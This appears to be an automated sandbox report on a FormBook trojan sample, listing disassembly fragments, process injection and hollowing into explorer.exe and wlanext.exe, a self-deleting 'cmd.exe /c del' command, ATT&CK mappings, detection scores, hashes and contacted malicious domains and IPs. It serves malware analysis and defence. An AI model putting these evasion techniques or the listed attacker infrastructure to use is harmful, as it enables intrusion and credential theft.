          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFEC0 mov eax, dword ptr fs:[00000030h]1_2_00ACFEC0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8ED6 mov eax, dword ptr fs:[00000030h]1_2_00AE8ED6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1E620 mov eax, dword ptr fs:[00000030h]1_2_00A1E620
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ACFE3F mov eax, dword ptr fs:[00000030h]1_2_00ACFE3F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]1_2_00A1C600
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]1_2_00A1C600
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A1C600 mov eax, dword ptr fs:[00000030h]1_2_00A1C600
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A48E00 mov eax, dword ptr fs:[00000030h]1_2_00A48E00
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AD1608 mov eax, dword ptr fs:[00000030h]1_2_00AD1608
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]1_2_00A4A61C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A61C mov eax, dword ptr fs:[00000030h]1_2_00A4A61C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2766D mov eax, dword ptr fs:[00000030h]1_2_00A2766D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3AE73 mov eax, dword ptr fs:[00000030h]1_2_00A3AE73
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A27E41 mov eax, dword ptr fs:[00000030h]1_2_00A27E41
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]1_2_00ADAE44
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00ADAE44 mov eax, dword ptr fs:[00000030h]1_2_00ADAE44
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A28794 mov eax, dword ptr fs:[00000030h]1_2_00A28794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]1_2_00A97794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]1_2_00A97794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A97794 mov eax, dword ptr fs:[00000030h]1_2_00A97794
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A537F5 mov eax, dword ptr fs:[00000030h]1_2_00A537F5
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]1_2_00A14F2E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A14F2E mov eax, dword ptr fs:[00000030h]1_2_00A14F2E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4E730 mov eax, dword ptr fs:[00000030h]1_2_00A4E730
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]1_2_00AE070D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE070D mov eax, dword ptr fs:[00000030h]1_2_00AE070D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]1_2_00A4A70E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A4A70E mov eax, dword ptr fs:[00000030h]1_2_00A4A70E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A3F716 mov eax, dword ptr fs:[00000030h]1_2_00A3F716
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]1_2_00AAFF10
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AAFF10 mov eax, dword ptr fs:[00000030h]1_2_00AAFF10
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2FF60 mov eax, dword ptr fs:[00000030h]1_2_00A2FF60
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00AE8F6A mov eax, dword ptr fs:[00000030h]1_2_00AE8F6A
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A2EF40 mov eax, dword ptr fs:[00000030h]1_2_00A2EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C138A mov eax, dword ptr fs:[00000030h]7_2_038C138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038BD380 mov ecx, dword ptr fs:[00000030h]7_2_038BD380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]7_2_03811B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03811B8F mov eax, dword ptr fs:[00000030h]7_2_03811B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383B390 mov eax, dword ptr fs:[00000030h]7_2_0383B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832397 mov eax, dword ptr fs:[00000030h]7_2_03832397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D5BA5 mov eax, dword ptr fs:[00000030h]7_2_038D5BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]7_2_03834BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]7_2_03834BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03834BAD mov eax, dword ptr fs:[00000030h]7_2_03834BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]7_2_038853CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038853CA mov eax, dword ptr fs:[00000030h]7_2_038853CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038303E2 mov eax, dword ptr fs:[00000030h]7_2_038303E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0382DBE9 mov eax, dword ptr fs:[00000030h]7_2_0382DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038C131B mov eax, dword ptr fs:[00000030h]7_2_038C131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB40 mov eax, dword ptr fs:[00000030h]7_2_0380DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038D8B58 mov eax, dword ptr fs:[00000030h]7_2_038D8B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380F358 mov eax, dword ptr fs:[00000030h]7_2_0380F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0380DB60 mov ecx, dword ptr fs:[00000030h]7_2_0380DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]7_2_03833B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03833B7A mov eax, dword ptr fs:[00000030h]7_2_03833B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]7_2_0383D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383D294 mov eax, dword ptr fs:[00000030h]7_2_0383D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038052A5 mov eax, dword ptr fs:[00000030h]7_2_038052A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]7_2_0381AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0381AAB0 mov eax, dword ptr fs:[00000030h]7_2_0381AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0383FAB0 mov eax, dword ptr fs:[00000030h]7_2_0383FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832ACB mov eax, dword ptr fs:[00000030h]7_2_03832ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03832AE4 mov eax, dword ptr fs:[00000030h]7_2_03832AE4
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Section loaded: unknown target: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 11C0000
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Process created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: explorer.exe, 00000004.00000002.906939906.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.919431085.0000000005E50000.00000004.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.655879856.0000000001080000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.908444659.0000000005E00000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.673301906.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe Code function: 0_2_00403348 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Access Token Manipulation 1 | Virtualization/Sandbox Evasion 3 | OS Credential Dumping | Security Software Discovery 231 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 512 | Access Token Manipulation 1 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 512 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 11 | Cached Domain Credentials | System Information Discovery 13 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

          Behavior Graph

          [Behavior graph image not preserved. Behavior Graph ID: 412599; Sample: 1cec9342_by_Libranalysis; Startdate: 12/05/2021; Architecture: WINDOWS; Score: 100. Process chain: 1cec9342_by_Libranalysis.exe (started; drops C:\Users\user\AppData\...\8t7v9o92aq2mtu.dll, PE32) -> 1cec9342_by_Libranalysis.exe (started) -> explorer.exe (injected) -> wlanext.exe (started) -> cmd.exe (started) -> conhost.exe (started).]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 1cec9342_by_Libranalysis.exe | 54% | Virustotal | |
          | 1cec9342_by_Libranalysis.exe | 24% | Metadefender | |
          | 1cec9342_by_Libranalysis.exe | 83% | ReversingLabs | Win32.Trojan.FormBook |
          | 1cec9342_by_Libranalysis.exe | 100% | Joe Sandbox ML | |

          Dropped Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll | 26% | Metadefender | |
          | C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll | 59% | ReversingLabs | Win32.Trojan.Spynoon |

          Unpacked PE Files

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | 7.2.wlanext.exe.3d17960.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |
          | 1.0.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 |
          | 0.0.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 |
          | 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 0.2.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366 |
          | 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
          | 7.2.wlanext.exe.354df80.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen |

          Domains

          | Source | Detection | Scanner | Label |
          |---|---|---|---|
          | rogersbeefarm.com | 0% | Virustotal | |
          | www.blissfulyogamullicahill.com | 0% | Virustotal | |
          | tecquestrian.com | 0% | Virustotal | |

          URLs


          Domains and IPs

          Contacted Domains


                                                      Contacted URLs


                                                      URLs from Memory and Binaries


                                                                                  Contacted IPs


                                                                                  Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 198.54.114.164 | nowhealthdays.com | United States | 22612 | NAMECHEAP-NETUS | true |
| 154.93.81.33 | www.cuntrera.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true |
| 3.16.197.4 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false |
| 34.102.136.180 | rogersbeefarm.com | United States | 15169 | GOOGLEUS | false |
| 23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true |
| 64.190.62.111 | www.booweats.com | United States | 11696 | NBS11696US | true |
| 209.222.96.146 | nobleandmarble.com | United States | 23470 | RELIABLESITEUS | true |
| 44.227.76.166 | pixie.porkbun.com | United States | 16509 | AMAZON-02US | false |
| 185.4.135.136 | directflence.com | Greece | 199246 | TOPHOSTGR | true |

                                                                                  General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 412599
Start date: 12.05.2021
Start time: 20:01:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 1cec9342_by_Libranalysis (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@14/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 29.4% (good quality ratio 26.5%)
• Quality average: 71.7%
• Quality standard deviation: 31.8%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 88
• Number of non-executed functions: 57
Cookbook Comments:
• Adjust boot time
• Enable AMSI

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  No simulations

                                                                                  Joe Sandbox View / Context

                                                                                  IPs


                                                                                  Domains


                                                                                  ASN

                                                                                  Updated Order list -804333.exeGet hashmaliciousBrowse
                                                                                  • 198.54.115.56
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHK457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                  • 156.252.96.189
                                                                                  New RFQ.exeGet hashmaliciousBrowse
                                                                                  • 154.92.64.253
                                                                                  PP,Sporda.exeGet hashmaliciousBrowse
                                                                                  • 160.124.137.188
                                                                                  Purchase Inquiry 11.05.2021.exeGet hashmaliciousBrowse
                                                                                  • 154.213.202.60
                                                                                  WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                                  • 154.215.87.72
                                                                                  PO09641.exeGet hashmaliciousBrowse
                                                                                  • 154.93.81.33
                                                                                  Purchase Order #330716o.exeGet hashmaliciousBrowse
                                                                                  • 154.88.205.33
                                                                                  original documents.exeGet hashmaliciousBrowse
                                                                                  • 154.220.41.208
                                                                                  SHIPPING DOCUMENT.exeGet hashmaliciousBrowse
                                                                                  • 154.220.41.208
                                                                                  c8080fbf_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                                                  • 154.86.42.252
                                                                                  REQUEST FOR NEW ORDER AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                  • 154.220.41.208
                                                                                  O1E623TjjW.exeGet hashmaliciousBrowse
                                                                                  • 43.230.169.157
                                                                                  SWIT BANK PAPER PAYMENT.exeGet hashmaliciousBrowse
                                                                                  • 154.213.207.4
                                                                                  PO_29_00412.exeGet hashmaliciousBrowse
                                                                                  • 154.216.244.232
                                                                                  z5Wqivscwd.exeGet hashmaliciousBrowse
                                                                                  • 154.88.201.82
                                                                                  8480fe6d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                  • 154.88.208.8
                                                                                  S4gONKzrzB.exeGet hashmaliciousBrowse
                                                                                  • 154.216.85.54
                                                                                  PO17439.exeGet hashmaliciousBrowse
                                                                                  • 103.234.52.224
                                                                                  gunzipped.exeGet hashmaliciousBrowse
                                                                                  • 103.234.52.32
                                                                                  FORM C.xlsxGet hashmaliciousBrowse
                                                                                  • 160.124.11.194

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\2813qk5gv9ujz
                                                                                  Process:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):164352
                                                                                  Entropy (8bit):7.998901832297446
                                                                                  Encrypted:true
                                                                                  SSDEEP:3072:4r3BCJ0FMjwgA0JMTxvUQEhWwlIeg7Gt7zukLKqe+vysSr8qato3:4dCJnY0y9sQEA97G9z3Kqe3r87W3
                                                                                  MD5:7DC8AC6B34FFA64B971758694AADCB96
                                                                                  SHA1:299F920FA6C052644823D3AB536775DF928EAF61
                                                                                  SHA-256:8353AECFB2593B6AD57D8C7E7DB4B9B58AC0C270C8E84855DF7A2ED1BCF0D825
                                                                                  SHA-512:4A1A77B9A533A29F8DC92C5DDDF1D2B6E06142B79894AC046809ADF2E596FD71149FD4FDF82EC0B2ADA875948419FF94A57B7C791BB8F3A7E13A3693EBE1A91D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  C:\Users\user\AppData\Local\Temp\fmkr8rw7aiu
                                                                                  Process:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6661
                                                                                  Entropy (8bit):7.892632251148882
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:3fypqb9FA5bh1/B+0/TAGzniLTz/mMBQHd:36qbAbh1J+TYiLej
                                                                                  MD5:9268E0879F7214B79FDE4DA628A11B0A
                                                                                  SHA1:94B741267433C27BC46640A56CEF8BE3810E6F0F
                                                                                  SHA-256:FFEDC245B88C6FF98AB9EE1F71DA75BBD4B1944BB60F114D42C383DD9942647B
                                                                                  SHA-512:C8DDFAD01D14FA1C68ADB4CAAD3E8E456EBCBEC1DB9E3067E3E9252B1C5E7FF1CF2877D58B11EC922767BD214480C218544D94C12D2E908649998B357A78A407
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll
                                                                                  Process:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):3.5950542702890798
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:Ss8QuwulW+QfPqgYyd0jPY703PCTYDb9dlITnMLNM:hmZzQ3iyog7ncDb9dEMLS
                                                                                  MD5:FEDB20F0FFDF6119BCE0B7430B2CBED1
                                                                                  SHA1:BF9DAB3E49CF209F8D338B7600451BB9B8F5464C
                                                                                  SHA-256:B24D4C68E856B6417FC51285E654AB86A4A0C92ECC6F639C71B6AC6DD7EDF61D
                                                                                  SHA-512:6FB2DAADC1650C788E00CDBAF32A97E03A7F4E485160D4A6AECBAA91C52CA595C2E586A866DF0839C0DE2DC89D0D07F0CAA7D94578391AC668FA91FAA872B4F6
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 59%
                                                                                  Reputation:low

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):6.821586500284818
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:1cec9342_by_Libranalysis.exe
                                                                                  File size:418969
                                                                                  MD5:1cec9342ac2c1f91201df672382672f2
                                                                                  SHA1:968ab56e042035a593279775308298cfdcdc0af7
                                                                                  SHA256:a1783d0a9f787d819b960b55c8ebfb227459bcb7daab55996720e8279751736f
                                                                                  SHA512:0aa688d114520cba9fa4559273dc65cf6142d1056e115da4552bb9ca09a866e838a1c58a7c1d916dd5be565b613211fbb21c12f92a48b202c7638863b9b2eb6c
                                                                                  SSDEEP:6144:59X0G4b5mFCQcGNYpmUIfvlQd+WSdCJnY0y9sQEA97G9z3Kqe3r87WQ:/0X5mFvcyYQhfvpW+Z197G9Kz3r89

                                                                                  File Icon

                                                                                  Icon Hash:2c5c9a72e286e871

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x403348
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                                                  TLS Callbacks:
